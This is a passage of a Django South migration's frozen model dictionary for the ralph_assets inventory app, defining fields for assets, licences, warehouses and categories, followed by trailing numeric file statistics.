'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'ralph_assets.asset': {
'Meta': {'object_name': 'Asset'},
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetCategory']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'delivery_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'deprecation_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2', 'blank': 'True'}),
'device_info': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['ralph_assets.DeviceInfo']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'force_deprecation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'invoice_no': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'model': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetModel']", 'on_delete': 'models.PROTECT'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'niw': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'office_info': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['ralph_assets.OfficeInfo']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'order_no': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'part_info': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['ralph_assets.PartInfo']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '10', 'decimal_places': '2'}),
'production_use_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'provider_order_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'remarks': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'request_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'slots': ('django.db.models.fields.FloatField', [], {'default': '0', 'max_length': '64'}),
'sn': ('django.db.models.fields.CharField', [], {'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'support_period': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'support_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'support_type': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'support_void_reporting': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'warehouse': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.Warehouse']", 'on_delete': 'models.PROTECT'})
},
'ralph_assets.assetcategory': {
'Meta': {'object_name': 'AssetCategory'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_blade': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'to': "orm['ralph_assets.AssetCategory']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'ralph_assets.assethistorychange': {
'Meta': {'object_name': 'AssetHistoryChange'},
'asset': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.Asset']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device_info': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.DeviceInfo']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'field_name': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_value': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'office_info': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.OfficeInfo']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'old_value': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'part_info': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.PartInfo']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'ralph_assets.assetmanufacturer': {
'Meta': {'object_name': 'AssetManufacturer'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.assetmodel': {
'Meta': {'object_name': 'AssetModel'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'manufacturer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetManufacturer']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.deviceinfo': {
'Meta': {'object_name': 'DeviceInfo'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'rack': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'ralph_device_id': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'u_height': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'u_level': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
},
'ralph_assets.officeinfo': {
'Meta': {'object_name': 'OfficeInfo'},
'attachment': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_last_inventory': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_logged_user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'license_key': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'license_type': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
},
'ralph_assets.partinfo': {
'Meta': {'object_name': 'PartInfo'},
'barcode_salvaged': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'device'", 'null': 'True', 'to': "orm['ralph_assets.Asset']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'source_device': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'source_device'", 'null': 'True', 'to': "orm['ralph_assets.Asset']"})
},
'ralph_assets.warehouse': {
'Meta': {'object_name': 'Warehouse'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.licence': {
'Meta': {'object_name': 'Licence'},
'accounting_id': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'asset_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'bought_date': ('django.db.models.fields.DateField', [], {}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'licence_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.LicenceType']", 'on_delete': 'models.PROTECT'}),
'manufacturer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetManufacturer']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'niw': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'number_bought': ('django.db.models.fields.IntegerField', [], {}),
'order_no': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['ralph_assets.Licence']"}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '10', 'decimal_places': '2'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'sn': ('django.db.models.fields.CharField', [], {'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'software_category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.SoftwareCategory']", 'on_delete': 'models.PROTECT'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'used': ('django.db.models.fields.IntegerField', [], {}),
'valid_thru': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'ralph_assets.licencetype': {
'Meta': {'object_name': 'LicenceType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.softwarecategory': {
'Meta': {'object_name': 'SoftwareCategory'},
'asset_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
}
complete_apps = ['ralph_assets']
| 94.927419
| 224
| 0.574038
| 2,413
| 23,542
| 5.474927
| 0.089101
| 0.104156
| 0.181213
| 0.258875
| 0.833699
| 0.803648
| 0.751798
| 0.702066
| 0.660889
| 0.577095
| 0
| 0.007302
| 0.173902
| 23,542
| 247
| 225
| 95.311741
| 0.671997
| 0.00429
| 0
| 0.34874
| 0
| 0
| 0.608525
| 0.348765
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008403
| false
| 0.004202
| 0.016807
| 0
| 0.037815
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc9aa46dc79d398e8f8e9180170d36d6c02742b8
| 6,139
|
py
|
Python
|
feapder/network/user_agent.py
|
jsntzxh/feapder
|
dd192393ae7ef63a00e7dec09900901f846fb67d
|
[
"MIT"
] | 1
|
2021-07-13T02:07:10.000Z
|
2021-07-13T02:07:10.000Z
|
feapder/network/user_agent.py
|
jsntzxh/feapder
|
dd192393ae7ef63a00e7dec09900901f846fb67d
|
[
"MIT"
] | null | null | null |
feapder/network/user_agent.py
|
jsntzxh/feapder
|
dd192393ae7ef63a00e7dec09900901f846fb67d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on 2016-12-28 17:55
---------
@summary:
---------
@author: Boris
@email: boris_liu@foxmail.com
"""
import random
# Pool of browser User-Agent strings used to vary outgoing HTTP requests.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
    "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36",
    "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36",
    "Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36",
    "Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
    "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14",
]


def get():
    """Return one User-Agent string chosen uniformly at random."""
    return random.choice(USER_AGENTS)
| 87.7
| 148
| 0.697671
| 1,167
| 6,139
| 3.648672
| 0.120823
| 0.106858
| 0.107797
| 0.234852
| 0.895021
| 0.895021
| 0.879051
| 0.867543
| 0.856505
| 0.790512
| 0
| 0.238702
| 0.131292
| 6,139
| 69
| 149
| 88.971014
| 0.559722
| 0.020362
| 0
| 0
| 0
| 0.910714
| 0.917582
| 0.003497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0.017857
| 0.017857
| 0.053571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5d77d3b0b614b447a3c3c087bacc901968beb582
| 114
|
py
|
Python
|
calc.py
|
hmiyake/my-test-repo-old
|
3c6b365861e69a0acd202ee9f520311a98810059
|
[
"MIT"
] | null | null | null |
calc.py
|
hmiyake/my-test-repo-old
|
3c6b365861e69a0acd202ee9f520311a98810059
|
[
"MIT"
] | 1
|
2021-08-04T02:33:32.000Z
|
2021-08-04T02:33:51.000Z
|
calc.py
|
hmiyake/my-test-repo-old
|
3c6b365861e69a0acd202ee9f520311a98810059
|
[
"MIT"
] | null | null | null |
#!/bin/env python
def calc_wa(val1, val2):
    """Return the sum ("wa") of the two operands."""
    total = val1 + val2
    return total
def calc_wari(val1, val2):
    """Return val1 divided ("wari") by val2 using true division.

    Raises ZeroDivisionError when val2 is zero, as the ``/`` operator does.
    """
    quotient = val1 / val2
    return quotient
| 14.25
| 26
| 0.684211
| 19
| 114
| 4
| 0.526316
| 0.421053
| 0.368421
| 0.473684
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0.192982
| 114
| 7
| 27
| 16.285714
| 0.73913
| 0.140351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
5d8a19a933e395c4b26816e27c4fefc1e9eef227
| 3,956
|
py
|
Python
|
tests/functional/parser/test_s3.py
|
Sordie/aws-lambda-powertools-python
|
12c512b78b8830bf2ed09e35d640df14afacfc1a
|
[
"Apache-2.0"
] | 1
|
2021-02-19T14:02:56.000Z
|
2021-02-19T14:02:56.000Z
|
tests/functional/parser/test_s3.py
|
Sordie/aws-lambda-powertools-python
|
12c512b78b8830bf2ed09e35d640df14afacfc1a
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/parser/test_s3.py
|
Sordie/aws-lambda-powertools-python
|
12c512b78b8830bf2ed09e35d640df14afacfc1a
|
[
"Apache-2.0"
] | null | null | null |
from aws_lambda_powertools.utilities.parser import event_parser
from aws_lambda_powertools.utilities.parser.models import S3Model, S3RecordModel
from aws_lambda_powertools.utilities.typing import LambdaContext
from tests.functional.parser.utils import load_event
def _assert_common_s3_record(record):
    # Shared checks for the single record present in both the plain and the
    # Glacier S3 test fixtures; the two handlers below differ only in the
    # glacierEventData assertions.
